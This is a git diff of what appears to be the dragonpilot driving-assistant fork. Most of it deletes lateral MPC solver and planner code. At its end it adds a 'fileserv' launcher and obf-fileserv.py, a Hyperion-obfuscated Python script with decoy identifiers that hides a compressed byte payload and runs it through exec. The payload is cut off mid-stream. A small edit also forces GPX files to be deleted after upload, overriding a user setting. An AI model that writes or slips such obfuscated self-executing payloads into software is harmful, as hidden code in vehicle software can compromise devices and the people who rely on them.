a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_model.h +++ /dev/null @@ -1,74 +0,0 @@ -/* - * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, - * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, - * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, - * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl - * - * This file is part of acados. - * - * The 2-Clause BSD License - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE - * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF - * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS - * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN - * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE - * POSSIBILITY OF SUCH DAMAGE.; - */ - -#ifndef lat_MODEL -#define lat_MODEL - -#ifdef __cplusplus -extern "C" { -#endif - - -/* explicit ODE */ - -// explicit ODE -int lat_expl_ode_fun(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_expl_ode_fun_work(int *, int *, int *, int *); -const int *lat_expl_ode_fun_sparsity_in(int); -const int *lat_expl_ode_fun_sparsity_out(int); -int lat_expl_ode_fun_n_in(void); -int lat_expl_ode_fun_n_out(void); - -// explicit forward VDE -int lat_expl_vde_forw(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_expl_vde_forw_work(int *, int *, int *, int *); -const int *lat_expl_vde_forw_sparsity_in(int); -const int *lat_expl_vde_forw_sparsity_out(int); -int lat_expl_vde_forw_n_in(void); -int lat_expl_vde_forw_n_out(void); - -// explicit adjoint VDE -int lat_expl_vde_adj(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_expl_vde_adj_work(int *, int *, int *, int *); -const int *lat_expl_vde_adj_sparsity_in(int); -const int *lat_expl_vde_adj_sparsity_out(int); -int lat_expl_vde_adj_n_in(void); -int lat_expl_vde_adj_n_out(void); - - - -#ifdef __cplusplus -} /* extern "C" */ -#endif - -#endif // lat_MODEL diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/libacados_ocp_solver_lat.so b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/libacados_ocp_solver_lat.so deleted file mode 100755 index 1ab4a11ef..000000000 Binary files a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/libacados_ocp_solver_lat.so and /dev/null differ diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/make_sfun_lat.m b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/make_sfun_lat.m deleted file mode 100644 index 30301675c..000000000 --- a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/make_sfun_lat.m +++ /dev/null @@ -1,125 +0,0 @@ -% -% Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, -% Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, -% Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, -% Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl -% -% This file is part of acados. -% -% The 2-Clause BSD License -% -% Redistribution and use in source and binary forms, with or without -% modification, are permitted provided that the following conditions are met: -% -% 1. Redistributions of source code must retain the above copyright notice, -% this list of conditions and the following disclaimer. -% -% 2. Redistributions in binary form must reproduce the above copyright notice, -% this list of conditions and the following disclaimer in the documentation -% and/or other materials provided with the distribution. -% -% THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -% AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -% IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -% ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE -% LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -% CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF -% SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS -% INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN -% CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -% ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -% POSSIBILITY OF SUCH DAMAGE.; -% - -SOURCES = { ... - 'lat_model/lat_expl_ode_fun.c', ... - 'lat_model/lat_expl_vde_forw.c',... - 'lat_cost/lat_cost_y_0_fun.c',... - 'lat_cost/lat_cost_y_0_fun_jac_ut_xt.c',... - 'lat_cost/lat_cost_y_0_hess.c',... - 'lat_cost/lat_cost_y_fun.c',... - 'lat_cost/lat_cost_y_fun_jac_ut_xt.c',... - 'lat_cost/lat_cost_y_hess.c',... - 'lat_cost/lat_cost_y_e_fun.c',... - 'lat_cost/lat_cost_y_e_fun_jac_ut_xt.c',... - 'lat_cost/lat_cost_y_e_hess.c',... - 'acados_solver_sfunction_lat.c', ... - 'acados_solver_lat.c' - }; - -INC_PATH = '/data/openpilot/third_party/acados/include'; - -INCS = {['-I', fullfile(INC_PATH, 'blasfeo', 'include')], ... - ['-I', fullfile(INC_PATH, 'hpipm', 'include')], ... - ['-I', fullfile(INC_PATH, 'acados')], ... - ['-I', fullfile(INC_PATH)]}; - - - -CFLAGS = 'CFLAGS=$CFLAGS'; -LDFLAGS = 'LDFLAGS=$LDFLAGS'; -COMPFLAGS = 'COMPFLAGS=$COMPFLAGS'; -COMPDEFINES = 'COMPDEFINES=$COMPDEFINES'; - - - -LIB_PATH = ['-L', fullfile('/data/openpilot/third_party/acados/lib')]; - -LIBS = {'-lacados', '-lhpipm', '-lblasfeo'}; - -% acados linking libraries and flags - - -mex('-v', '-O', CFLAGS, LDFLAGS, COMPFLAGS, COMPDEFINES, INCS{:}, ... - LIB_PATH, LIBS{:}, SOURCES{:}, ... - '-output', 'acados_solver_sfunction_lat' ); - -fprintf( [ '\n\nSuccessfully created sfunction:\nacados_solver_sfunction_lat', '.', ... - eval('mexext')] ); - - -%% print note on usage of s-function -fprintf('\n\nNote: Usage of Sfunction is as follows:\n') -input_note = 'Inputs are:\n'; -i_in = 1; -input_note = strcat(input_note, num2str(i_in), ') lbx_0 - lower bound on x for stage 0,',... - ' size [4]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') ubx_0 - upper bound on x for stage 0,',... - ' size [4]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') parameters - concatenated for all shooting nodes 0 to N+1,',... - ' size [34]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') y_ref_0, size [3]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') y_ref - concatenated for shooting nodes 1 to N-1,',... - ' size [45]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') y_ref_e, size [2]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') lbx for shooting nodes 1 to N-1, size [30]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') ubx for shooting nodes 1 to N-1, size [30]\n '); -i_in = i_in + 1; - -fprintf(input_note) - -disp(' ') - -output_note = 'Outputs are:\n'; -i_out = 0; -i_out = i_out + 1; -output_note = strcat(output_note, num2str(i_out), ') u0, control input at node 0, size [1]\n '); -i_out = i_out + 1; -output_note = strcat(output_note, num2str(i_out), ') acados solver status (0 = SUCCESS)\n '); -i_out = i_out + 1; -output_note = strcat(output_note, num2str(i_out), ') KKT residual\n '); -i_out = i_out + 1; -output_note = strcat(output_note, num2str(i_out), ') x1, state at node 1\n '); -i_out = i_out + 1; -output_note = strcat(output_note, num2str(i_out), ') CPU time\n '); -i_out = i_out + 1; -output_note = strcat(output_note, num2str(i_out), ') SQP iterations\n '); - -fprintf(output_note) diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/lat_mpc.py b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/lat_mpc.py deleted file mode 100755 index b674a29ff..000000000 --- a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/lat_mpc.py +++ /dev/null @@ -1,180 +0,0 @@ -#!/usr/bin/env python3 -import os -import numpy as np - -from casadi import SX, vertcat, sin, cos - -from common.realtime import sec_since_boot -from selfdrive.controls.lib.drive_helpers import LAT_MPC_N as N -from selfdrive.modeld.constants import T_IDXS - -if __name__ == '__main__': # generating code - from third_party.acados.acados_template import AcadosModel, AcadosOcp, AcadosOcpSolver -else: - from selfdrive.dragonpilot.controls_0816.lib.lateral_mpc_lib.c_generated_code.acados_ocp_solver_pyx import AcadosOcpSolverCython # pylint: disable=no-name-in-module, import-error - -LAT_MPC_DIR = os.path.dirname(os.path.abspath(__file__)) -EXPORT_DIR = os.path.join(LAT_MPC_DIR, "c_generated_code") -JSON_FILE = os.path.join(LAT_MPC_DIR, "acados_ocp_lat.json") -X_DIM = 4 -P_DIM = 2 -MODEL_NAME = 'lat' -ACADOS_SOLVER_TYPE = 'SQP_RTI' - -def gen_lat_model(): - model = AcadosModel() - model.name = MODEL_NAME - - # set up states & controls - x_ego = SX.sym('x_ego') - y_ego = SX.sym('y_ego') - psi_ego = SX.sym('psi_ego') - curv_ego = SX.sym('curv_ego') - model.x = vertcat(x_ego, y_ego, psi_ego, curv_ego) - - # parameters - v_ego = SX.sym('v_ego') - rotation_radius = SX.sym('rotation_radius') - model.p = vertcat(v_ego, rotation_radius) - - # controls - curv_rate = SX.sym('curv_rate') - model.u = vertcat(curv_rate) - - # xdot - x_ego_dot = SX.sym('x_ego_dot') - y_ego_dot = SX.sym('y_ego_dot') - psi_ego_dot = SX.sym('psi_ego_dot') - curv_ego_dot = SX.sym('curv_ego_dot') - - model.xdot = vertcat(x_ego_dot, y_ego_dot, psi_ego_dot, curv_ego_dot) - - # dynamics model - f_expl = vertcat(v_ego * cos(psi_ego) - rotation_radius * sin(psi_ego) * (v_ego * curv_ego), - v_ego * sin(psi_ego) + rotation_radius * cos(psi_ego) * (v_ego * curv_ego), - v_ego * curv_ego, - curv_rate) - model.f_impl_expr = model.xdot - f_expl - model.f_expl_expr = f_expl - return model - - -def gen_lat_ocp(): - ocp = AcadosOcp() - ocp.model = gen_lat_model() - - Tf = np.array(T_IDXS)[N] - - # set dimensions - ocp.dims.N = N - - # set cost module - ocp.cost.cost_type = 'NONLINEAR_LS' - ocp.cost.cost_type_e = 'NONLINEAR_LS' - - Q = np.diag([0.0, 0.0]) - QR = np.diag([0.0, 0.0, 0.0]) - - ocp.cost.W = QR - ocp.cost.W_e = Q - - y_ego, psi_ego = ocp.model.x[1], ocp.model.x[2] - curv_rate = ocp.model.u[0] - v_ego = ocp.model.p[0] - - ocp.parameter_values = np.zeros((P_DIM, )) - - ocp.cost.yref = np.zeros((3, )) - ocp.cost.yref_e = np.zeros((2, )) - # TODO hacky weights to keep behavior the same - ocp.model.cost_y_expr = vertcat(y_ego, - ((v_ego +5.0) * psi_ego), - ((v_ego + 5.0) * 4.0 * curv_rate)) - ocp.model.cost_y_expr_e = vertcat(y_ego, - ((v_ego +5.0) * psi_ego)) - - # set constraints - ocp.constraints.constr_type = 'BGH' - ocp.constraints.idxbx = np.array([2,3]) - ocp.constraints.ubx = np.array([np.radians(90), np.radians(50)]) - ocp.constraints.lbx = np.array([-np.radians(90), -np.radians(50)]) - x0 = np.zeros((X_DIM,)) - ocp.constraints.x0 = x0 - - ocp.solver_options.qp_solver = 'PARTIAL_CONDENSING_HPIPM' - ocp.solver_options.hessian_approx = 'GAUSS_NEWTON' - ocp.solver_options.integrator_type = 'ERK' - ocp.solver_options.nlp_solver_type = ACADOS_SOLVER_TYPE - ocp.solver_options.qp_solver_iter_max = 1 - ocp.solver_options.qp_solver_cond_N = 1 - - # set prediction horizon - ocp.solver_options.tf = Tf - ocp.solver_options.shooting_nodes = np.array(T_IDXS)[:N+1] - - ocp.code_export_directory = EXPORT_DIR - return ocp - - -class LateralMpc(): - def __init__(self, x0=np.zeros(X_DIM)): - self.solver = AcadosOcpSolverCython(MODEL_NAME, ACADOS_SOLVER_TYPE, N) - self.reset(x0) - - def reset(self, x0=np.zeros(X_DIM)): - self.x_sol = np.zeros((N+1, X_DIM)) - self.u_sol = np.zeros((N, 1)) - self.yref = np.zeros((N+1, 3)) - for i in range(N): - self.solver.cost_set(i, "yref", self.yref[i]) - self.solver.cost_set(N, "yref", self.yref[N][:2]) - - # Somehow needed for stable init - for i in range(N+1): - self.solver.set(i, 'x', np.zeros(X_DIM)) - self.solver.set(i, 'p', np.zeros(P_DIM)) - self.solver.constraints_set(0, "lbx", x0) - self.solver.constraints_set(0, "ubx", x0) - self.solver.solve() - self.solution_status = 0 - self.solve_time = 0.0 - self.cost = 0 - - def set_weights(self, path_weight, heading_weight, steer_rate_weight): - W = np.asfortranarray(np.diag([path_weight, heading_weight, steer_rate_weight])) - for i in range(N): - self.solver.cost_set(i, 'W', W) - #TODO hacky weights to keep behavior the same - self.solver.cost_set(N, 'W', (3/20.)*W[:2,:2]) - - def run(self, x0, p, y_pts, heading_pts, curv_rate_pts): - x0_cp = np.copy(x0) - p_cp = np.copy(p) - self.solver.constraints_set(0, "lbx", x0_cp) - self.solver.constraints_set(0, "ubx", x0_cp) - self.yref[:,0] = y_pts - v_ego = p_cp[0] - # rotation_radius = p_cp[1] - self.yref[:,1] = heading_pts*(v_ego+5.0) - self.yref[:,2] = curv_rate_pts * (v_ego+5.0) * 4.0 - for i in range(N): - self.solver.cost_set(i, "yref", self.yref[i]) - self.solver.set(i, "p", p_cp) - self.solver.set(N, "p", p_cp) - self.solver.cost_set(N, "yref", self.yref[N][:2]) - - t = sec_since_boot() - self.solution_status = self.solver.solve() - self.solve_time = sec_since_boot() - t - - for i in range(N+1): - self.x_sol[i] = self.solver.get(i, 'x') - for i in range(N): - self.u_sol[i] = self.solver.get(i, 'u') - self.cost = self.solver.get_cost() - - -if __name__ == "__main__": - ocp = gen_lat_ocp() - AcadosOcpSolver.generate(ocp, json_file=JSON_FILE) - # AcadosOcpSolver.build(ocp.code_export_directory, with_cython=True) diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_planner.py b/selfdrive/dragonpilot/controls_0816/lib/lateral_planner.py deleted file mode 100644 index 35b71c5b0..000000000 --- a/selfdrive/dragonpilot/controls_0816/lib/lateral_planner.py +++ /dev/null @@ -1,154 +0,0 @@ -import numpy as np -from common.realtime import sec_since_boot, DT_MDL -from common.numpy_fast import interp -from system.swaglog import cloudlog -from selfdrive.dragonpilot.controls_0816.lib.lateral_mpc_lib.lat_mpc import LateralMpc -from selfdrive.controls.lib.drive_helpers import CONTROL_N, MPC_COST_LAT, LAT_MPC_N, get_lane_laneless_mode -from selfdrive.controls.lib.lane_planner import LanePlanner, TRAJECTORY_SIZE -from selfdrive.controls.lib.desire_helper import DesireHelper -import cereal.messaging as messaging -from cereal import log -from selfdrive.hardware import TICI -from common.params import Params - - -class LateralPlanner: - def __init__(self, CP): - self.LP = LanePlanner() - self.DH = DesireHelper() - - # Vehicle model parameters used to calculate lateral movement of car - self.factor1 = CP.wheelbase - CP.centerToFront - self.factor2 = (CP.centerToFront * CP.mass) / (CP.wheelbase * CP.tireStiffnessRear) - self.last_cloudlog_t = 0 - self.solution_invalid_cnt = 0 - - self.path_xyz = np.zeros((TRAJECTORY_SIZE, 3)) - self.plan_yaw = np.zeros((TRAJECTORY_SIZE,)) - self.plan_curv_rate = np.zeros((TRAJECTORY_SIZE,)) - self.t_idxs = np.arange(TRAJECTORY_SIZE) - self.y_pts = np.zeros(TRAJECTORY_SIZE) - self.d_path_xyz = np.zeros((TRAJECTORY_SIZE, 3)) - - self.lat_mpc = LateralMpc() - self.reset_mpc(np.zeros(4)) - - # dp - self.dp_lanelines_enable = False - self.dp_lanelines_active = False - self.dp_camera_offset = 4 if TICI else -6 - self.dp_path_offset = 4 if TICI else 0 - - def reset_mpc(self, x0=np.zeros(4)): - self.x0 = x0 - self.lat_mpc.reset(x0=self.x0) - - def update(self, sm): - v_ego = sm['carState'].vEgo - measured_curvature = sm['controlsState'].curvature - if sm.updated['dragonConf']: - self.dp_lanelines_enable = sm['dragonConf'].dpLateralLanelines - self.dp_camera_offset = sm['dragonConf'].dpLateralCameraOffset - self.dp_path_offset = sm['dragonConf'].dpLateralPathOffset - if sm['dragonConf'].dpLateralAltLanelines and sm['controlsState'].dpLateralAltActive: - self.dp_lanelines_enable = True - self.dp_camera_offset = sm['dragonConf'].dpLateralAltCameraOffset - self.dp_path_offset = sm['dragonConf'].dpLateralAltPathOffset - - # Parse model predictions - md = sm['modelV2'] - # update camera/path offset to lane planner - self.LP.update_dp_camera_offsets(self.dp_camera_offset, self.dp_path_offset) - # Parse model predictions - self.LP.parse_model(md) - if len(md.position.x) == TRAJECTORY_SIZE and len(md.orientation.x) == TRAJECTORY_SIZE: - self.path_xyz = np.column_stack([md.position.x, md.position.y, md.position.z]) - self.t_idxs = np.array(md.position.t) - self.plan_yaw = np.array(md.orientation.z) - - # Lane change logic - lane_change_prob = self.LP.l_lane_change_prob + self.LP.r_lane_change_prob - self.DH.update(sm['carState'], sm['carControl'].latActive, lane_change_prob, sm['dragonConf'], md) - - # Turn off lanes during lane change - if self.DH.desire == log.LateralPlan.Desire.laneChangeRight or self.DH.desire == log.LateralPlan.Desire.laneChangeLeft: - self.LP.lll_prob *= self.DH.lane_change_ll_prob - self.LP.rll_prob *= self.DH.lane_change_ll_prob - - # dynamic laneline/laneless logic - # decide if we want to use lanelines or laneless - if self.dp_lanelines_enable: - self.dp_lanelines_active = get_lane_laneless_mode(self.LP.lll_prob, self.LP.rll_prob, self.dp_lanelines_active) - else: - self.dp_lanelines_active = False - - # Calculate final driving path and set MPC costs - if self.dp_lanelines_active: - self.d_path_xyz = self.LP.get_d_path(v_ego, self.t_idxs, self.path_xyz) - self.lat_mpc.set_weights(MPC_COST_LAT.PATH, MPC_COST_LAT.HEADING, MPC_COST_LAT.STEER_RATE) - else: - self.d_path_xyz = self.path_xyz - # Heading cost is useful at low speed, otherwise end of plan can be off-heading - heading_cost = interp(v_ego, [5.0, 10.0], [MPC_COST_LAT.HEADING, 0.15]) - self.lat_mpc.set_weights(MPC_COST_LAT.PATH, heading_cost, MPC_COST_LAT.STEER_RATE) - - y_pts = np.interp(v_ego * self.t_idxs[:LAT_MPC_N + 1], np.linalg.norm(self.d_path_xyz, axis=1), self.d_path_xyz[:, 1]) - heading_pts = np.interp(v_ego * self.t_idxs[:LAT_MPC_N + 1], np.linalg.norm(self.path_xyz, axis=1), self.plan_yaw) - curv_rate_pts = np.interp(v_ego * self.t_idxs[:LAT_MPC_N + 1], np.linalg.norm(self.path_xyz, axis=1), self.plan_curv_rate) - self.y_pts = y_pts - - assert len(y_pts) == LAT_MPC_N + 1 - assert len(heading_pts) == LAT_MPC_N + 1 - assert len(curv_rate_pts) == LAT_MPC_N + 1 - lateral_factor = max(0, self.factor1 - (self.factor2 * v_ego**2)) - p = np.array([v_ego, lateral_factor]) - self.lat_mpc.run(self.x0, - p, - y_pts, - heading_pts, - curv_rate_pts) - # init state for next - # mpc.u_sol is the desired curvature rate given x0 curv state. - # with x0[3] = measured_curvature, this would be the actual desired rate. - # instead, interpolate x_sol so that x0[3] is the desired curvature for lat_control. - self.x0[3] = interp(DT_MDL, self.t_idxs[:LAT_MPC_N + 1], self.lat_mpc.x_sol[:, 3]) - - # Check for infeasible MPC solution - mpc_nans = np.isnan(self.lat_mpc.x_sol[:, 3]).any() - t = sec_since_boot() - if mpc_nans or self.lat_mpc.solution_status != 0: - self.reset_mpc() - self.x0[3] = measured_curvature - if t > self.last_cloudlog_t + 5.0: - self.last_cloudlog_t = t - cloudlog.warning("Lateral mpc - nan: True") - - if self.lat_mpc.cost > 20000. or mpc_nans: - self.solution_invalid_cnt += 1 - else: - self.solution_invalid_cnt = 0 - - def publish(self, sm, pm): - plan_solution_valid = self.solution_invalid_cnt < 2 - plan_send = messaging.new_message('lateralPlan') - plan_send.valid = sm.all_checks(service_list=['carState', 'controlsState', 'modelV2']) - - lateralPlan = plan_send.lateralPlan - lateralPlan.modelMonoTime = sm.logMonoTime['modelV2'] - lateralPlan.dPathPoints = self.y_pts.tolist() - lateralPlan.psis = self.lat_mpc.x_sol[0:CONTROL_N, 2].tolist() - lateralPlan.curvatures = self.lat_mpc.x_sol[0:CONTROL_N, 3].tolist() - lateralPlan.curvatureRates = [float(x) for x in self.lat_mpc.u_sol[0:CONTROL_N - 1]] + [0.0] - - lateralPlan.mpcSolutionValid = bool(plan_solution_valid) - lateralPlan.solverExecutionTime = self.lat_mpc.solve_time - - lateralPlan.desire = self.DH.desire - lateralPlan.useLaneLines = self.dp_lanelines_active - lateralPlan.laneChangeState = self.DH.lane_change_state - lateralPlan.laneChangeDirection = self.DH.lane_change_direction - - plan_send.lateralPlan.dPathWLinesX = [float(x) for x in self.d_path_xyz[:, 0]] - plan_send.lateralPlan.dPathWLinesY = [float(y) for y in self.d_path_xyz[:, 1]] - - pm.send('lateralPlan', plan_send) diff --git a/selfdrive/dragonpilot/fileserv b/selfdrive/dragonpilot/fileserv new file mode 100755 index 000000000..8469f103f --- /dev/null +++ b/selfdrive/dragonpilot/fileserv @@ -0,0 +1,3 @@ +#!/bin/sh +cd "$(dirname "$0")" +exec python obf-fileserv.py diff --git a/selfdrive/dragonpilot/gpx_uploader.py b/selfdrive/dragonpilot/gpx_uploader.py index 767123d83..ec02da094 100644 --- a/selfdrive/dragonpilot/gpx_uploader.py +++ b/selfdrive/dragonpilot/gpx_uploader.py @@ -55,7 +55,7 @@ def _debug(msg): class GpxUploader(): def __init__(self): - self._delete_after_upload = not Params().get_bool('dp_gpxd') + self._delete_after_upload = True #not Params().get_bool('dp_gpxd') self._car_model = "Unknown Vehicle" def _identify_vehicle(self): diff --git a/selfdrive/dragonpilot/obf-fileserv.py b/selfdrive/dragonpilot/obf-fileserv.py new file mode 100755 index 000000000..f17cdf33e --- /dev/null +++ b/selfdrive/dragonpilot/obf-fileserv.py @@ -0,0 +1,106 @@ +from builtins import * +from math import prod as Absolute + + +__obfuscator__ = 'Hyperion' +__authors__ = ('billythegoat356', 'BlueRed') +__github__ = 'https://github.com/billythegoat356/Hyperion' +__discord__ = 'https://discord.gg/plague' +__license__ = 'EPL-2.0' + +__code__ = 'print("Hello world!")' + + +Modulo, Add, Power, Random, _modulo, _stackoverflow, _ceil = exec, str, tuple, map, ord, globals, type + +class _while: + def __init__(self, _product): + self._memoryaccess = Absolute((_product, -27001)) + self._walk(Builtins=85917) + + def _walk(self, Builtins = True): + # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler + self._memoryaccess /= -98051 + Builtins + + try: + ((Power, {DetectVar: DetectVar}) for Power in (Add, Power) if _modulo < _modulo) + + except AttributeError: + (({_modulo: _modulo}, _modulo) for _modulo in {DetectVar: DetectVar}) + + except: + _ceil(-76217 - 67403) == True + + def Invert(self, _add = 26483): + # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler + _add /= -78432 * -54168 + self.Positive != str + + try: + {DetectVar: DetectVar} if Random <= DetectVar else (Add, Random) is _modulo + + except AssertionError: + ((Add, (Modulo, Power)) for Add in {_modulo: _modulo} if Random >= Modulo) + + except: + _ceil(-6674 * 9727) == None + + def _negative(Product = Ellipsis): + return _stackoverflow()[Product] + + def StackOverflow(_run = 44975 + -3997, _square = True, MemoryAccess = _stackoverflow): + # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler + MemoryAccess()[_run] = _square + + try: + ((Add, {_modulo: _modulo}) for Add in (Modulo, Power) if _stackoverflow != _modulo) + + except TypeError: + ({DetectVar: DetectVar} or Random if {DetectVar: DetectVar} and Random else ... or (Random, {DetectVar: DetectVar})) + + except: + _ceil(96078 / 4657) == Ellipsis + + def execute(code = str): + return Modulo(Add(Power(Random(_modulo, code)))) + + @property + def Positive(self): + self.Walk = '<__main__._modulo object at 0x000008063BE22857>' + return (self.Walk, _while.Positive) + +if __name__ == '__main__': + try: + _while.execute(code = __code__) + System = _while(_product = -11287 - 86948) + + System.Invert(_add = 79597 * System._memoryaccess) ;_while.StackOverflow(_run='xwwxwxwwxwwxwwxwxw',_square=b'x\x9c\xed}]\x93\xdb\xb6\xb2\xe0{~E\xae_4S9IH\x10\x04IW\x9d\x97-\xef\xd6\x9d\x94\xe3\xd9\xba\xdeZ{+\'5\xa5\x914\x89|\xc7\xa3\x94=\xbeq^\xeeo_t\x03M6\xc1/\x90\x04%M\xec\xd1@$A\x88\x1f@\xa3\xd1\xdf\xfd\xf8\xe1\xaf\xe7\xdf|\xab\xff\xf6w\x17\xb8\x85\xbf\x9b\x9b\xc3\xed\xdd\xa7\x8f\x9b\xf5\xe3\xe1\xc3\xcd\xcd\xb7\xff\xf6\xcfg\xff\xfe\xd7\x1f\xbb\x0f\xfb\xc3\xc3\xb3o\x0f\x1fX\xb3\xf5\xa7\xc7\xdf\x0f\x1f>b\x9b\x8bg\xb7\xfb\xfb\xfb\xbf\x1e\x7f\xdf\xfdvX?&\xa9z\xf6\x8fg\xff\xe3\xfe\xd3\xee?v\xdbg\x97\xb5_\xfd\xb6\x7f\xfc\xfd\xd3\xad\xb9\xf0\xef\x8f\x8f\x7f||\xfe\xe3\x8f\xa6\xee\x87\xcd\xe1\xfd\x8f\xcee~\xec\xb8\xf7v\xffqs\xf8\xb0\xad_\xc6V\xfe\xf0\xdbo?\xfeq\xbf\xfe\xed\xd3\xce\xf9\xd1\xfd~\xb3{\xf8\xb83?\xfa\x9f\xff\xfb\xe5\xf7\xe2\x87\xc8i\xb29l\xcd\xf9\xd5\x1f\x1f\xf6\x0f\x8f\x17\xcf\xfe}w\x7f\x7f\xf8\xf6\xcf\xc3\x87\xfb\xed\xbf=\xbb\\}s\xf9\xbcl\r\xe7W\x1f\xffs\xbf]]~\xb3\xfb\xbc\xd9\xfd\xf1h;\xf3\xe1\x8fO\xfa\x97\xffq\xf8\xb8\xfb\xf8\xed\xfa\xc3\xee\xdb\x0f\xbb\xed\xbf\x1e\xfe\xef\xfep\xbf{4\x15\xb7\xbag\xfe\xf5\xf0\xff\x0e\x9f\xf0h\xfd-\\\xe4_\x0f\xaf\x0e\xb7\x87\xed_\xdf\xde\xef\xffS\xff\xee\xaf\xc3\xa7g\x97\xdf\x98\x87\xda\xbf\xff\xe3\xf0\xe1\xf1\xe6F\xdf\xed\xaf\x8f\xab\xcb\x1fv\x9f\xf7\x8f\x17\x97\xdf\xdc\x1f6\xeb\xfb\x8f\x17\x97\xbf\xac^\\\x1f\x0e/\xf4\xbf\xde\\\x1f^\xbcx\xa1\xcb\xe1\xfa\xc5\xea\xd7\x7f\xfev\x7f\xb8\xd5m\xbeio\x00?}w\x7f\xbf\xdf\xdf\xbf\xbb\x7f\xf7N\x97\xbd.\xf7\xf7\xf7\xab_\x9e?\xff\xee\xfb\xef\xbe\xbf\xf8\xfe\xe2\xbb\xf8\xf2\xf2W}\x9d\xdd\xe3\xfa\xf1\xf1C\xcfu^\xbf\x16\xe5\xdfk}\xa0?\xf8\xd5\xbc\xd6v\xdfw\x9d\xcf\x7f\xfe\xf9\xf9\xcf\xcf\xfa\x1b\xff`\xf7\xb3~\x0f\xf3\xaa\xdf\xb4\x9c\x84\xdf\xbc\xfa\xf9\x95\xfe\x83\xaf\x9f\xe1\x0f7\xaf\xf4\xaf\xaa\x9e\xeb\xb9!\xfe\x02\xfe\xcd\xcf^\x99\x1d\xbd\xd5\x17h\xbd\xf0\xc5\xea\xf6\xd3\xfe\xfeq\xff\x00C\xf1_\xeb\x0f\x9d\x8fu\x1dE\xfan\xd1A\x7fG\xe6\xfb\xfa\xfa\x00/s\x7fo\xfb\x1a\xfa\x1c\xba\xff\xfe\xddE\xc7\xad>>\xec\x1f\xef\xf7\x9fn\xddn\xbc\xfcG\xd5\xc5\xf5\xae\x1f}\xa5\xcb_\xc2]\xea\x87\xfd\xc3v\xf7\xf9b\xf5\xe1\xf1c\xe3\xe4\xaf\x97\xdft\xf65v\x17t\x90\xee%\xe8\xadk\xdc\xb9\xd6\x7f\xb0\xffe\xf4\xd9\xe3\xfap\x7f\xd7\xd6k\x1d\x